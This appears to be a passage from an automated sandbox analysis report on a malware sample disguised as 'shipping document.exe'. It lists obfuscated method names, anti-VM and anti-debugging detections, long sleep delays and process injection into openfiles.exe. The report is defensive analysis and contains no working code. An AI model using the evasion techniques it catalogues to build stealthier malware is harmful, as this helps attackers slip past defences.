              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, YDmVa3b2SMMfc8PDHv.csHigh entropy of concatenated method names: 'gYBuJN9rEx', 'Hbuu3NCpke', 'qFNuAIN9dZ', 'mYWueL9Vfb', 'hwluoBxrs3', 'NjwuE1xRmI', 'eYVuFyvpfo', 'Q7Juq2DQQ7', 'AC9u9DJTcr', 'DDNuahU9H3'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, omX1sAmpb7YlgoyEOa.csHigh entropy of concatenated method names: 'lf9jqTj4FA', 'Kyfjabxrm9', 'Kveiw95qT7', 'vbSisxBjrh', 't05jbioFSF', 'CJGjIqPfcn', 'alxjWZrc3c', 'vHYjJs4Gnc', 'WhHj3LZ7oE', 'INljAcxIOk'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, QFbnZv5nUopkM31AEm.csHigh entropy of concatenated method names: 'zum0si84un', 'xNV0LbWBrA', 'Hwb0tM3qsV', 'bqZ0X7R5Rl', 'FLV0uWem5H', 'z9M0NQQ6It', 'BUf02pAQGf', 'CxSiFXhlhx', 'FyRiqrYqVF', 'p3ji9UZjtB'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, L80iZtF00YB24EpXgL.csHigh entropy of concatenated method names: 'wW5xdRCfZx', 'Xg6xYnFlJE', 'Oh6x1W6C4f', 'MA8xS5GL5o', 'PFfxRDdMLU', 'DXKx57J8QE', 'wkJxpYN0qt', 'm5nxKbe9O9', 'zTTxQP8Tve', 'HLexbOvGlN'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, ejoofSV7fnSjUw2fi6.csHigh entropy of concatenated method names: 'Re1CXD0QXu', 'WTNCM9Oof7', 'uq4C2hukhw', 'tsm2aStNq9', 'L4n2z51Cp5', 'IVOCwcmiYQ', 'kqJCsBO9YC', 'welChY4ljj', 'KJPCLsZbxs', 'nIbCtIyaEj'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, xMm9lx8h3995ywK4BF.csHigh entropy of concatenated method names: 'Dispose', 'Ua2s9FEIGV', 'fMlhS5qrWP', 'x0GVVJ6G8Y', 'ThqsaY4Pjv', 'm87szn8ZJu', 'ProcessDialogKey', 'I50hwR3cvu', 'SJBhsi6qx2', 'oj4hhRxXwi'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, iG14yNa7nO8cosR7XGL.csHigh entropy of concatenated method names: 'tPB0DlTMiG', 'lW106Lp4FB', 'Aon074uARG', 'D8m0PtWLCV', 'zut0faXsrg', 'Nri0UPs5D2', 'mTo04mg48b', 'LD40dqnuZc', 'uZQ0YpuL9A', 'N7j0HK1nwB'
              Source: 0.2.shipping document.exe.5ad0000.5.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
              Source: 0.2.shipping document.exe.5ad0000.5.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: shipping document.exe PID: 6192, type: MEMORYSTR
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: 3110000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: 33A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: 31A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: 7FA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: 8FA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: 9140000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: A140000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: A6D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: B6D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: C6D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A096E rdtsc 2_2_017A096E
              Source: C:\Users\user\Desktop\shipping document.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeWindow / User API: threadDelayed 9822Jump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeAPI coverage: 0.7 %
              Source: C:\Windows\SysWOW64\openfiles.exeAPI coverage: 2.6 %
              Source: C:\Users\user\Desktop\shipping document.exe TID: 6416Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exe TID: 3452Thread sleep count: 149 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exe TID: 3452Thread sleep time: -298000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exe TID: 3452Thread sleep count: 9822 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exe TID: 3452Thread sleep time: -19644000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe TID: 3704Thread sleep time: -75000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe TID: 3704Thread sleep time: -45000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe TID: 3704Thread sleep count: 40 > 30Jump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe TID: 3704Thread sleep time: -40000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\openfiles.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027AB970 FindFirstFileW,FindNextFileW,FindClose,7_2_027AB970
              Source: C:\Users\user\Desktop\shipping document.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: oWRaEnEJAq.exe, 00000008.00000002.4110608352.00000000014F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
              Source: openfiles.exe, 00000007.00000002.4110059356.0000000002AEA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2318590089.000002CA98FEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\shipping document.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A096E rdtsc 2_2_017A096E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_00417513 LdrLoadDll,2_2_00417513
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01804180 mov eax, dword ptr fs:[00000030h]2_2_01804180
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01804180 mov eax, dword ptr fs:[00000030h]2_2_01804180
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0181C188 mov eax, dword ptr fs:[00000030h]2_2_0181C188
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0181C188 mov eax, dword ptr fs:[00000030h]2_2_0181C188
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01766154 mov eax, dword ptr fs:[00000030h]2_2_01766154
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01766154 mov eax, dword ptr fs:[00000030h]2_2_01766154
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175C156 mov eax, dword ptr fs:[00000030h]2_2_0175C156
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F8158 mov eax, dword ptr fs:[00000030h]2_2_017F8158
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F4144 mov eax, dword ptr fs:[00000030h]2_2_017F4144
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F4144 mov eax, dword ptr fs:[00000030h]2_2_017F4144
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F4144 mov ecx, dword ptr fs:[00000030h]2_2_017F4144
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F4144 mov eax, dword ptr fs:[00000030h]2_2_017F4144
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F4144 mov eax, dword ptr fs:[00000030h]2_2_017F4144
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018261C3 mov eax, dword ptr fs:[00000030h]2_2_018261C3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018261C3 mov eax, dword ptr fs:[00000030h]2_2_018261C3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01790124 mov eax, dword ptr fs:[00000030h]2_2_01790124
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018361E5 mov eax, dword ptr fs:[00000030h]2_2_018361E5
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017901F8 mov eax, dword ptr fs:[00000030h]2_2_017901F8
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180E10E mov eax, dword ptr fs:[00000030h]2_2_0180E10E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180E10E mov ecx, dword ptr fs:[00000030h]2_2_0180E10E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180E10E mov eax, dword ptr fs:[00000030h]2_2_0180E10E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180E10E mov eax, dword ptr fs:[00000030h]2_2_0180E10E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180E10E mov ecx, dword ptr fs:[00000030h]2_2_0180E10E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180E10E mov eax, dword ptr fs:[00000030h]2_2_0180E10E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180E10E mov eax, dword ptr fs:[00000030h]2_2_0180E10E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180E10E mov ecx, dword ptr fs:[00000030h]2_2_0180E10E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180E10E mov eax, dword ptr fs:[00000030h]2_2_0180E10E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180E10E mov ecx, dword ptr fs:[00000030h]2_2_0180E10E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01820115 mov eax, dword ptr fs:[00000030h]2_2_01820115
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180A118 mov ecx, dword ptr fs:[00000030h]2_2_0180A118
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180A118 mov eax, dword ptr fs:[00000030h]2_2_0180A118
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180A118 mov eax, dword ptr fs:[00000030h]2_2_0180A118
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180A118 mov eax, dword ptr fs:[00000030h]2_2_0180A118
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE1D0 mov eax, dword ptr fs:[00000030h]2_2_017DE1D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE1D0 mov eax, dword ptr fs:[00000030h]2_2_017DE1D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE1D0 mov ecx, dword ptr fs:[00000030h]2_2_017DE1D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE1D0 mov eax, dword ptr fs:[00000030h]2_2_017DE1D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE1D0 mov eax, dword ptr fs:[00000030h]2_2_017DE1D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E019F mov eax, dword ptr fs:[00000030h]2_2_017E019F
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E019F mov eax, dword ptr fs:[00000030h]2_2_017E019F
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E019F mov eax, dword ptr fs:[00000030h]2_2_017E019F
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E019F mov eax, dword ptr fs:[00000030h]2_2_017E019F
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175A197 mov eax, dword ptr fs:[00000030h]2_2_0175A197
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175A197 mov eax, dword ptr fs:[00000030h]2_2_0175A197
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175A197 mov eax, dword ptr fs:[00000030h]2_2_0175A197
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01834164 mov eax, dword ptr fs:[00000030h]2_2_01834164
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01834164 mov eax, dword ptr fs:[00000030h]2_2_01834164
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A0185 mov eax, dword ptr fs:[00000030h]2_2_017A0185
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178C073 mov eax, dword ptr fs:[00000030h]2_2_0178C073
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01762050 mov eax, dword ptr fs:[00000030h]2_2_01762050
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E6050 mov eax, dword ptr fs:[00000030h]2_2_017E6050
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018260B8 mov eax, dword ptr fs:[00000030h]2_2_018260B8
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018260B8 mov ecx, dword ptr fs:[00000030h]2_2_018260B8
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F6030 mov eax, dword ptr fs:[00000030h]2_2_017F6030
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175A020 mov eax, dword ptr fs:[00000030h]2_2_0175A020
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175C020 mov eax, dword ptr fs:[00000030h]2_2_0175C020
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177E016 mov eax, dword ptr fs:[00000030h]2_2_0177E016
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177E016 mov eax, dword ptr fs:[00000030h]2_2_0177E016
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177E016 mov eax, dword ptr fs:[00000030h]2_2_0177E016
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177E016 mov eax, dword ptr fs:[00000030h]2_2_0177E016
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E4000 mov ecx, dword ptr fs:[00000030h]2_2_017E4000
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01802000 mov eax, dword ptr fs:[00000030h]2_2_01802000
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01802000 mov eax, dword ptr fs:[00000030h]2_2_01802000
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01802000 mov eax, dword ptr fs:[00000030h]2_2_01802000
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01802000 mov eax, dword ptr fs:[00000030h]2_2_01802000
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01802000 mov eax, dword ptr fs:[00000030h]2_2_01802000
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01802000 mov eax, dword ptr fs:[00000030h]2_2_01802000
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01802000 mov eax, dword ptr fs:[00000030h]2_2_01802000
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01802000 mov eax, dword ptr fs:[00000030h]2_2_01802000
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175C0F0 mov eax, dword ptr fs:[00000030h]2_2_0175C0F0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A20F0 mov ecx, dword ptr fs:[00000030h]2_2_017A20F0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0175A0E3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E60E0 mov eax, dword ptr fs:[00000030h]2_2_017E60E0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017680E9 mov eax, dword ptr fs:[00000030h]2_2_017680E9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E20DE mov eax, dword ptr fs:[00000030h]2_2_017E20DE
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017580A0 mov eax, dword ptr fs:[00000030h]2_2_017580A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F80A8 mov eax, dword ptr fs:[00000030h]2_2_017F80A8
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176208A mov eax, dword ptr fs:[00000030h]2_2_0176208A
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E035C mov eax, dword ptr fs:[00000030h]2_2_017E035C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E035C mov eax, dword ptr fs:[00000030h]2_2_017E035C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E035C mov eax, dword ptr fs:[00000030h]2_2_017E035C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E035C mov ecx, dword ptr fs:[00000030h]2_2_017E035C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E035C mov eax, dword ptr fs:[00000030h]2_2_017E035C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E035C mov eax, dword ptr fs:[00000030h]2_2_017E035C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E2349 mov eax, dword ptr fs:[00000030h]2_2_017E2349
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E2349 mov eax, dword ptr fs:[00000030h]2_2_017E2349
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E2349 mov eax, dword ptr fs:[00000030h]2_2_017E2349
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E2349 mov eax, dword ptr fs:[00000030h]2_2_017E2349
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E2349 mov eax, dword ptr fs:[00000030h]2_2_017E2349
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E2349 mov eax, dword ptr fs:[00000030h]2_2_017E2349
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E2349 mov eax, dword ptr fs:[00000030h]2_2_017E2349
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E2349 mov eax, dword ptr fs:[00000030h]2_2_017E2349
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E2349 mov eax, dword ptr fs:[00000030h]2_2_017E2349
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E2349 mov eax, dword ptr fs:[00000030h]2_2_017E2349
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E2349 mov eax, dword ptr fs:[00000030h]2_2_017E2349
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E2349 mov eax, dword ptr fs:[00000030h]2_2_017E2349
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E2349 mov eax, dword ptr fs:[00000030h]2_2_017E2349
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E2349 mov eax, dword ptr fs:[00000030h]2_2_017E2349
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E2349 mov eax, dword ptr fs:[00000030h]2_2_017E2349
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0181C3CD mov eax, dword ptr fs:[00000030h]2_2_0181C3CD
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018043D4 mov eax, dword ptr fs:[00000030h]2_2_018043D4
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018043D4 mov eax, dword ptr fs:[00000030h]2_2_018043D4
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180E3DB mov eax, dword ptr fs:[00000030h]2_2_0180E3DB
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180E3DB mov eax, dword ptr fs:[00000030h]2_2_0180E3DB
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180E3DB mov ecx, dword ptr fs:[00000030h]2_2_0180E3DB
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180E3DB mov eax, dword ptr fs:[00000030h]2_2_0180E3DB
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175C310 mov ecx, dword ptr fs:[00000030h]2_2_0175C310
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01780310 mov ecx, dword ptr fs:[00000030h]2_2_01780310
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179A30B mov eax, dword ptr fs:[00000030h]2_2_0179A30B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179A30B mov eax, dword ptr fs:[00000030h]2_2_0179A30B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179A30B mov eax, dword ptr fs:[00000030h]2_2_0179A30B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017963FF mov eax, dword ptr fs:[00000030h]2_2_017963FF
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177E3F0 mov eax, dword ptr fs:[00000030h]2_2_0177E3F0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177E3F0 mov eax, dword ptr fs:[00000030h]2_2_0177E3F0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177E3F0 mov eax, dword ptr fs:[00000030h]2_2_0177E3F0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017703E9 mov eax, dword ptr fs:[00000030h]2_2_017703E9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017703E9 mov eax, dword ptr fs:[00000030h]2_2_017703E9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017703E9 mov eax, dword ptr fs:[00000030h]2_2_017703E9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017703E9 mov eax, dword ptr fs:[00000030h]2_2_017703E9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017703E9 mov eax, dword ptr fs:[00000030h]2_2_017703E9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017703E9 mov eax, dword ptr fs:[00000030h]2_2_017703E9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017703E9 mov eax, dword ptr fs:[00000030h]2_2_017703E9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017703E9 mov eax, dword ptr fs:[00000030h]2_2_017703E9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01838324 mov eax, dword ptr fs:[00000030h]2_2_01838324
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01838324 mov ecx, dword ptr fs:[00000030h]2_2_01838324
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01838324 mov eax, dword ptr fs:[00000030h]2_2_01838324
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01838324 mov eax, dword ptr fs:[00000030h]2_2_01838324
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017683C0 mov eax, dword ptr fs:[00000030h]2_2_017683C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017683C0 mov eax, dword ptr fs:[00000030h]2_2_017683C0
